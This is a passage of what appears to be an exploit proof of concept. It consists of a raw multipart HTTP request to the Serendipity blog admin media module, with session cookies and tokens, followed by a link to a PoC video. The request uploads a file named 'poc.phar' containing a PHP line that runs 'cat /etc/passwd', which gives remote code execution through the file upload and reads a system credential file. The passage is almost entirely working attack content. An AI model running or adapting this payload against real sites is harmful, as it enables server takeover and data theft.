http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect&serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=430b341df3f78f52691c8cf935fa04e1c05854df; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[hideSubdirFiles]=; serendipity[addmedia_directory]=; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.date; serendipity[sortorder_ordermode]=DESC; serendipity[filter][i.date][from]=; serendipity[filter][i.date][to]=; serendipity[filter][i.name]=; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=267; serendipity[imgWidth]=1000; serendipity[imgHeight]=667; serendipity[imgID]=1; serendipity[baseURL]=http%3A//localhost/serendipity/; serendipity[indexFile]=index.php; serendipity[imgName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.jpeg; serendipity[thumbName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.serendipityThumb.jpeg; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; accessibletab_mediaupload_tabs_active=0; serendipity[filter][fileCategory]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b<br />Connection: close<br /><br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[token]"<br /><br />ae9b8ae35a756c24f9552a021ee81d56<br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[action]"<br /><br />admin<br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[adminModule]"<br /><br />media<br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[adminAction]"<br /><br />add<br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[userfile][1]"; filename="poc.phar"<br />Content-Type: application/octet-stream<br /><br /><?php echo system("cat /etc/passwd");?><br /><br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[target_filename][1]"<br /><br />poc.phar<br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[target_directory][1]"<br /><br /><br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[column_count][1]"<br /><br />true<br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[imageurl]"<br /><br /><br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[imageimporttype]"<br /><br />image<br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[target_filename][]"<br /><br /><br />------WebKitFormBoundaryZWKPiba66PSVGQzc<br />Content-Disposition: form-data; name="serendipity[target_directory][]"<br /><br /><br />------WebKitFormBoundaryZWKPiba66PSVGQzc--<br /><br /><br />poc video : https://youtu.be/_VrrKOTywgo<br /><br /></code></pre>